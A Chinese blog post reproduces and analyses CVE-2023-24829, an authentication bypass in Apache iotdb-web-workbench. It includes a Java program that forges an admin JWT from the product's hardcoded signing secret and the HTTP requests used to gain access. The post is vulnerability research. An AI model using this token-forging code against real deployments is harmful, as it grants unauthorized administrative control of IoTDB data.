Apache iotdb-web-workbench 认证绕过漏洞 CVE-2023-24829

于 2023-03-28 17:36:07 发布
阅读量509 收藏
点赞数
文章标签: apache iotdb 前端 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38154820/article/details/129828486
版权

漏洞简介

8edfa602284b6b8157e783b0ae3aace9.png

  影响版本 0.13.0 <= 漏洞版本 < 0.13.3

  漏洞主要来自于 iotdb-web-workbench IoTDB-Workbench是IoTDB的可视化管理工具,可对IoTDB的数据进行增删改查、权限控制等,简化IoTDB的使用及学习成本。iotdb-web-workbench 中存在不正确的身份验证漏洞

环境搭建

  我们发现在 Releases 中已经删除到只剩最新版本,所以我们从 commits 中查找历史提交记录来搭建环境

1c06eefe4cd9b373019bffde9ca5d5db.png 70897c22351e98be467c3a0cbfbf8437.png

  下载下历史版本的源码,下载之后利用 docker 搭建环境

  需要修改一下 docker-compose.yml 将其中挂载数据库文件修改为

volumes:
      - ./backend/src/main/resources/sqlite/iotdb.db:/sqlite/iotdb.db

  直接在根目录下执行 docker-compose up -d 虽然镜像编译成功,但是执行后一直启动不成功,通过 docker logs 查看日志信息

e1fdf98782337bfc6bad6820eebd9a13.png

  发现后台的 jar 包没有编译成功拷贝到容器内,所以先进入 backend 执行 mvn package 编译 jar 。默认情况下都是依赖于 aliyunmaven 但是很奇怪这次编译时会提示无法从 aliyun 中下载文件,所以将 maven 的 settings.xml 配置文件关于 aliyun 的相关依赖注释掉,就可以编译成功。

  编译成功之后,再次执行发现了问题仍然存在,还是相同的错误类型。后来无论怎么修改 backend 目录下对应的 Dockerfile 文件,仍然无法成功。最后发现是因为没有修改根目录中的 docker-compose.yml,下载的仍然是有问题的镜像,没有去调用编译本地的镜像。

682433cb160c35e3c4f7705a72a7d359.png

  进到 backend 目录下 修改 Dockerfile 文件 删除掉 "${JAVA_MEM_OPTS}"

  执行 docker build -t test:v1 . 编译镜像

67d3c2d64773c4cd42ae625125e658e4.png

  编译之后,将 docker-compose.yml 中的 apache/iotdb-web-workbench:0.13.0-backend 替换为 test:v1

  再执行 docker-compose up -d

596d8dbd7459b4fba31f0ee8494edc98.png

  访问 http://127.0.0.1:8081/#/login

86bf5b9bbe569c67b0a7813397744b43.png

  环境如此就搭建好了,但是在实际中利用的话,还是建议不要使用 docker ,而是单独编译前端后端。

漏洞复现

  构造数据包请求保存用户时

e307496ce0d51116ac4625f86aafd10d.png

  提示没有登录

  创建一个 java 项目

import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;

import java.util.Date;

public class iotdb_CreateToken {

    private static String secret =
            "HSyJ0eXAiOiJKV1QasdfffffffSd3g8923402347523fffasdfasgwaegwaegawegawegawegawetwgewagagew"
                    + "asdf23r23DEEasdfawef134t2fawt2g325gafasdfasdfiLCJhbGciOiJIUzI1NiJ9";
    public static String generateToken(String username) {
        Date now = new Date();
        //    Calendar instance = Calendar.getInstance();
        //    instance.add(Calendar.HOUR_OF_DAY, 24);
        Date expireDate = new Date(new Date().getTime() + (1000 * 60 * 60 * 10));
        return Jwts.builder()
                .setHeaderParam("type", "JWT")
                .setSubject(0 + "")
                .setIssuedAt(now) // 签发时间
                .claim("userId", 1)
                .claim("name", username)
                .setExpiration(expireDate) // 过期时间
                .signWith(SignatureAlgorithm.HS512, secret)
                .compact();
    }

    public static void main(String[] args) {
        String token = generateToken("admin");
        System.out.println(token);
    }
}
a9d1228de4c42b811e953f5f3ed2d3e9.png

  将生成的 Token 加入到之前的数据包中

9f687ca7122653140f8e01068a348201.png

  创建用户成功,尝试登录

POST /api/login?name=test&password=123456 HTTP/1.1
Host: 127.0.0.1:8081
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 4

{
}
fb2ae1bb17061c6012aba55518c8ba85.png

  登录成功

漏洞分析

  org.apache.iotdb.admin.filter.TokenFilter#preHandle

17bb7fa7ea7a37210fbbe74232eba0e8.png

  在 TokenFilter 中 JJwtTool.getClaimsByToken(authorization); 从请求头中获取 token 并解析匹配

  org.apache.iotdb.admin.controller.UserController#login

ef93cb6a09827c58dc57c155bb4cb641.png

  我们发现 token 的来源是因为登录成功后会根据用户来生成 token JJwtTool.generateToken(user)

  org.apache.iotdb.admin.tool.JJwtTool#generateToken

e8f988a3dad702207052ac46fc8ceae6.png

  生成 Token 的相关参数均是可控的,所以我们可以自己构造

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:edu@antvsion.com

文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情,点我查看!

ee3a416407b4d56b28a996c01a346580.gif

靶场实操,戳“阅读原文“

蚁景网安实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
博客
Netfilter漏洞提权利用(CVE-2023-35001)
04-25 884
Netfilter是一个用于Linux操作系统的网络数据包过滤框架,它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式,以实现网络安全、网络地址转换(Network Address Translation,NAT)、数据包过滤等功能。
博客
一次奇妙的任意用户登录实战
04-22 361
刚刚进行了微信sessionkey的学习,正准备实战一下,就发现了这个神奇的网站,预知后事如何,请继续向下看去。
博客
CTF中常见的四种python逆向
04-18 977
pyc是一种二进制文件,是由py文件经过编译后,生成的文件,是一种byte code,py文件变成pyc文件后,加载的速度有所提高,pyc 文件是 Python 编译过的字节码文件。它是 Python 程序在运行过程中由源代码(通常是 .py 文件)自动或手动编译产生的二进制文件。
博客
记一次奇妙的某个edu渗透测试
04-16 254
对登录方法的轻视造成一系列的漏洞出现,对接口确实鉴权造成大量的信息泄露。从小程序到web端网址的奇妙的测试就此开始。
博客
记一次对某高校微信小程序的漏洞挖掘
04-15 314
挖掘目标部署在微信的资产,减少信息的收集,毕竟一般web站点没有账号密码不好进入后台,挖掘功能点少。
博客
从CVE复现看栈溢出漏洞利用
04-12 935
最近复现了两个栈溢出漏洞的cve,分别是CVE-2017-9430和CVE-2017-13089,简单记录一下real wrold中的栈溢出漏洞学习。目前,栈溢出漏洞主要出现在iot固件中,linux下的已经很少了,所以这两个洞都是17年,比较早,但还是能学到一些东西。
博客
KASLR绕过及提权利用(CVE-2023-35001)
04-11 690
关于KASLR绕过,可以利用byteorder操作加上netlink组订阅可以泄露rule中的handle字段,该方法应该是可以用来泄露kernel基地址的,但是作者还提出另一种方法进行泄露,应该是为了提权利用做铺垫。
博客
关于转义符 \ 在php正则中的匹配问题
04-09 1117
这道题在网上的wp基本都是直接用`\`去执行命令,但很少有人能去讨论为什么可以这么绕过,后端代码已经做出了过滤,为什么还是会被绕过,我很幸运能够看到更深的分析。
博客
中间件漏洞攻防学习总结
04-09 917
Apache(阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略。
博客
甲方安全建设之研发安全-SCA
04-08 907
大多数企业或多或少的会去采购第三方软件,或者研发同学在开发代码时,可能会去使用一些好用的软件包或者依赖包,但是如果这些包中存在恶意代码,又或者在安装包时不小心打错了字母安装了错误的软件包,则可能出现供应链攻击。
博客
甲方安全建设之日志采集实操干货
04-07 913
没有永远的安全,如何在被攻击的情况下,快速响应和快速溯源分析攻击动作是个重要的话题。想要分析攻击者做了什么、怎么攻击进来的、还攻击了谁,那么日志是必不可少的一项,因此我们需要尽可能采集多的日志来进行分析攻击者的动作,甚至在攻击者刚落脚的时候就阻断攻击者。
博客
腾讯云(CVM)托管进行权限维持
04-02 624
刚好看到一个师傅分享了一个阿里云ECS实战攻防,然后想到了同样利用腾讯云CVM的托管亦可实现在实战攻防中的权限维持。腾讯云自动化助手(TencentCloud Automation Tools,TAT)是一个原生运维部署工具,它可以在不登录或输入密码的情况下,实现对云服务器 CVM 和轻量应用服务器 Lighthouse 的自动化远程操作。
博客
liblzma/xz被植入后门,过程堪比谍战片!
04-01 863
3月29日,微软PostgreSQL开发人员Andres Freund在调试SSH性能问题时,在开源安全邮件列表中发帖称,他在XZ软件包中发现了一个涉及混淆恶意代码的供应链攻击。据Freund和RedHat称,Git版XZ中没有恶意代码,只有完整下载包中存在。但是这个代码的提交人两年前就加入了项目维护,暂时不能确定之前的版本有没有问题。
博客
回味经典,踏入iot安全世界,DIR-815 多次溢出漏洞分析复现
03-26 860
前言在进行IOT安全领域的学习和实践中,经典漏洞的复现是必不可少的一环。本文将介绍一个经典漏洞,涉及到Binwalk、firmware-mod-kit、FirmAE等工具的使用,以及对DIR-815路由器中多次溢出漏洞的复现过程。固件下载地址:https://legacyfiles.us.dlink.com/DIR-815/REVA/FIRMWARE/这个漏洞属于经典范畴,很多人选择通过此漏洞进行...
博客
踏入IOT安全世界:DIR-815路由器多次溢出漏洞分析复现
03-26 822
在进行IOT安全领域的学习和实践中,经典漏洞的复现是必不可少的一环。本文将介绍一个经典漏洞,涉及到Binwalk、firmware-mod-kit、FirmAE等工具的使用,以及对DIR-815路由器中多次溢出漏洞的复现过程。
博客
2024西湖论剑-phpems-代码审计
03-25 679
2024西湖论剑数据安全题,太菜了当时没看明白,系统是phpems,修改了默认密码,需要利用CVE登上去(CVE-2023-6654),菜鸟学习,大佬多指点。
博客
小程序绕过 sign 签名
03-20 894
之前看到了一篇文章【小程序绕过sign签名思路】之前在做小程序渗透时也遇到了这种情况,但是直接放弃测试了,发现这种思路后,又遇到了这种情况,记录下过程。
博客
S2-066漏洞分析与复现(CVE-2023-50164)
03-20 486
自struts2官方纰漏S2-066漏洞已经有一段时间,期间断断续续地写,直到最近才完成。回顾一下官方通告:2023.12.9发布,编号CVE-2023-50164,主要影响版本是 2.5.0-2.5.32 以及 6.0.0-6.3.0,描述中提到了文件上传漏洞和目录穿越漏洞。
博客
S2-066分析与复现
03-19 706
Foreword自struts2官方纰漏S2-066漏洞已经有一段时间,期间断断续续地写,直到最近才完成,o(╥﹏╥)o。羞愧地回顾一下官方通告:2023.12.9发布,编号CVE-2023-50164,主要影响版本是 2.5.0-2.5.32 以及 6.0.0-6.3.0,描述中提到了文件上传漏洞和目录穿越漏洞。开始以为这是个组合漏洞,其实不是,这是一个漏洞,看了几篇大佬的文章,有的把它称为“文...
博客
新手向-从VNCTF2024的一道题学习QEMU Escape
03-15 612
[F] 说在前面本文的草稿是边打边学边写出来的,文章思路会与一个“刚打完用户态 pwn 题就去打 QEMU Escape ”的人的思路相似,在分析结束以后我又在部分比较模糊的地方加入了一些补充,因此阅读起来可能会相对轻松(当然也不排除这是我自以为是????)[1] 题目分析流程[1-1] 启动文件分析读Dockerfile,了解到它在搭起环境以后启动了start.sh,再读start.sh,了解到它...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值